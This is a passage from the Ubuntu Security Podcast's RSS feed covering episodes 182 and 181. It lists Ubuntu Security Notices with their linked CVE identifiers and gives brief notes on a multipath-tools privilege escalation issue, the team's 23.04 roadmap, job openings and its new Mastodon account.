<li><a href="https://ubuntu.com/security/CVE-2022-2153">CVE-2022-2153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41222">CVE-2022-41222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5729-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5729-1">USN-5729-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39190">CVE-2022-39190</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3625">CVE-2022-3625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2905">CVE-2022-2905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5727-2-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5727-2">USN-5727-2</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2153">CVE-2022-2153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5728-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5728-2">USN-5728-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42719">CVE-2022-42719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3625">CVE-2022-3625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2153">CVE-2022-2153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41222">CVE-2022-41222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5729-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5729-2">USN-5729-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39190">CVE-2022-39190</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3625">CVE-2022-3625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2905">CVE-2022-2905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5730-1-webkitgtk-vulnerabilities-02-41">[<a href="https://ubuntu.com/security/notices/USN-5730-1">USN-5730-1</a>] WebKitGTK vulnerabilities [02:41]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42824">CVE-2022-42824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42823">CVE-2022-42823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42799">CVE-2022-42799</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32923">CVE-2022-32923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32888">CVE-2022-32888</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream version 2.38.2 fixing various web-engine related
vulnerabilities</li>
</ul>
<h3 id="usn-5731-1-multipath-tools-vulnerabilities-03-05">[<a href="https://ubuntu.com/security/notices/USN-5731-1">USN-5731-1</a>] multipath-tools vulnerabilities [03:05]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41974">CVE-2022-41974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41973">CVE-2022-41973</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues discovered by Qualys - one in handling of symlinks in <code>/dev/shm</code> and
the other around the handling of UNIX domain sockets - could be combined
together with another unspecified vulnerability in a different component
installed by default on Ubuntu Server 22.04 to achieve privilege escalation to
root - will be interesting to find out what this other vulnerability is in the
future</li>
</ul>
<h3 id="usn-5638-2-expat-vulnerabilities-03-53">[<a href="https://ubuntu.com/security/notices/USN-5638-2">USN-5638-2</a>] Expat vulnerabilities [03:53]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43680">CVE-2022-43680</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40674">CVE-2022-40674</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-179/#usn-5638-1-expat-vulnerability-07-55">[USN-5638-1] Expat vulnerability from Episode 179</a></li>
</ul>
<h3 id="usn-5732-1-unbound-vulnerability-04-02">[<a href="https://ubuntu.com/security/notices/USN-5732-1">USN-5732-1</a>] Unbound vulnerability [04:02]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3204">CVE-2022-3204</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5686-2-usn-5686-3-git-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5686-2">USN-5686-2</a>, <a href="https://ubuntu.com/security/notices/USN-5686-3">USN-5686-3</a>] Git vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39260">CVE-2022-39260</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39253">CVE-2022-39253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-181/#usn-5686-1-git-vulnerabilities">[USN-5686-1] Git vulnerabilities from Episode 181</a></li>
</ul>
<h3 id="usn-5733-1-flac-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5733-1">USN-5733-1</a>] FLAC vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-0561">CVE-2021-0561</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0499">CVE-2020-0499</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6888">CVE-2017-6888</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5658-3-dhcp-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5658-3">USN-5658-3</a>] DHCP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2929">CVE-2022-2929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2928">CVE-2022-2928</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5716-2-sqlite-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5716-2">USN-5716-2</a>] SQLite vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-35737">CVE-2022-35737</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5734-1-freerdp-vulnerabilities-04-15">[<a href="https://ubuntu.com/security/notices/USN-5734-1">USN-5734-1</a>] FreeRDP vulnerabilities [04:15]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39347">CVE-2022-39347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39320">CVE-2022-39320</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39319">CVE-2022-39319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39318">CVE-2022-39318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39317">CVE-2022-39317</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39316">CVE-2022-39316</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39283">CVE-2022-39283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39282">CVE-2022-39282</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5735-1-sysstat-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5735-1">USN-5735-1</a>] Sysstat vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39377">CVE-2022-39377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5737-1-apr-util-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5737-1">USN-5737-1</a>] APR-util vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-12618">CVE-2017-12618</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="23-dot-04-ubuntu-security-roadmap-04-52">23.04 Ubuntu Security roadmap [04:52]</h3>
<ul>
<li>Since the last podcast in <a href="https://ubuntusecuritypodcast.org/episode-181/">Episode 181</a>, had both the 23.04 start-of-cycle
product roadmap sprint and engineering sprints in Prague (followed by the
Ubuntu Summit)</li>
<li>Some of the highlights for the Ubuntu Security team&rsquo;s 23.04 roadmap
<ul>
<li>Tabletop exercises</li>
<li>Improvements to OVAL data</li>
<li>Various AppArmor improvements including user namespace mediation across the
distro, plus working with upstream kernel developers on <code>io_uring</code> mediation</li>
<li>Security improvements for Ubuntu Core including better integrity
verification</li>
<li>Usual security and other ongoing maintenance tasks
<ul>
<li>CVE patching, MIR package reviews, Snap Store security reviews, FIPS
maintenance and more</li>
</ul>
</li>
<li>A heap of customer specific / commercially sensitive stuff too</li>
</ul>
</li>
<li>Will talk more about a lot of these topics in future episodes</li>
</ul>
<h3 id="hiring-08-46">Hiring [08:46]</h3>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180">https://canonical.com/careers/2925180</a></li>
<li>Engineer position in the security maintenance team</li>
</ul>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/4717512">https://canonical.com/careers/4717512</a></li>
<li>Engineer in the security certifications team</li>
</ul>
<h4 id="ubuntu-security-manager">Ubuntu Security Manager</h4>
<ul>
<li><a href="https://canonical.com/careers/4192903">https://canonical.com/careers/4192903</a></li>
<li>One requisition, looking to fill multiple different manager positions -
Security Maintenance, Security Certifications and Security Technologies teams</li>
</ul>
<h3 id="the-ubuntu-security-team-is-now-part-of-the-mastodon-fediverse-10-10">The Ubuntu Security Team is now part of the Mastodon Fediverse [10:10]</h3>
<ul>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a></li>
<li>With all the recent drama on twitter, decided to establish a presence on the
fosstodon.org Mastodon instance as well</li>
<li>Mastodon is similar to twitter but instead of being one single centralised
service, consists of multiple federated servers - so a user on one server can
follow users on other servers - but allows different communities to have their
own servers if desired</li>
<li>Appears to be a good alternative to Twitter</li>
<li>Will operate both and try to keep the two in-sync</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a>,</li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E182.mp3" length="13700462" type="audio/mpeg" /><itunes:duration>759</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 181
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-181/</link>
          <pubDate>Fri, 21 Oct 2022 14:45:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>839836f9dd9bad7919f073bec8b68fd043469979b807d947a2efdcd917ffb2876f478c7431a4dd2f50df9e6122fe2ca3da6ce6661a09e71f8e3531e0b50d17fb</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 181</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's the release of Ubuntu 22.10 Kinetic Kudu, and we give you all the details
  on what's new and improved, with a particular focus on the security features,
  plus we cover a high priority vulnerability in libksba as well.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's the release of Ubuntu 22.10 Kinetic Kudu, and we give you all the details
  on what's new and improved, with a particular focus on the security features,
  plus we cover a high priority vulnerability in libksba as well.
  </itunes:summary>
        <description>  It's the release of Ubuntu 22.10 Kinetic Kudu, and we give you all the details
  on what's new and improved, with a particular focus on the security features,
  plus we cover a high priority vulnerability in libksba as well.
  </description>
        <googleplay:description>  It's the release of Ubuntu 22.10 Kinetic Kudu, and we give you all the details
  on what's new and improved, with a particular focus on the security features,
  plus we cover a high priority vulnerability in libksba as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s the release of Ubuntu 22.10 Kinetic Kudu, and we give you all the details
on what&rsquo;s new and improved, with a particular focus on the security features,
plus we cover a high priority vulnerability in libksba as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>39 unique CVEs addressed</p>
<h3 id="usn-5672-1-gmp-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5672-1">USN-5672-1</a>] GMP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43618">CVE-2021-43618</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5673-1-unzip-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5673-1">USN-5673-1</a>] unzip vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0530">CVE-2022-0530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0529">CVE-2022-0529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4217">CVE-2021-4217</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5674-1-xml-security-library-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5674-1">USN-5674-1</a>] XML Security Library vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-1000061">CVE-2017-1000061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5675-1-heimdal-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5675-1">USN-5675-1</a>] Heimdal vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3116">CVE-2022-3116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3671">CVE-2021-3671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12098">CVE-2019-12098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16860">CVE-2018-16860</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5677-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5677-1">USN-5677-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3176">CVE-2022-3176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4159">CVE-2021-4159</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5678-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5678-1">USN-5678-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0812">CVE-2022-0812</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5679-1-linux-kernel--hwe--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5679-1">USN-5679-1</a>] Linux kernel (HWE) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0812">CVE-2022-0812</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5676-1-postgresql-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5676-1">USN-5676-1</a>] PostgreSQL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1552">CVE-2022-1552</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5680-1-gthumb-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5680-1">USN-5680-1</a>] gThumb vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36427">CVE-2020-36427</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20326">CVE-2019-20326</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5682-1-linux-kernel--aws--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5682-1">USN-5682-1</a>] Linux kernel (AWS) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3176">CVE-2022-3176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4159">CVE-2021-4159</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5683-1-linux-kernel--ibm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5683-1">USN-5683-1</a>] Linux kernel (IBM) vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39189">CVE-2022-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34495">CVE-2022-34495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34494">CVE-2022-34494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33743">CVE-2022-33743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3176">CVE-2022-3176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1882">CVE-2022-1882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5684-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5684-1">USN-5684-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
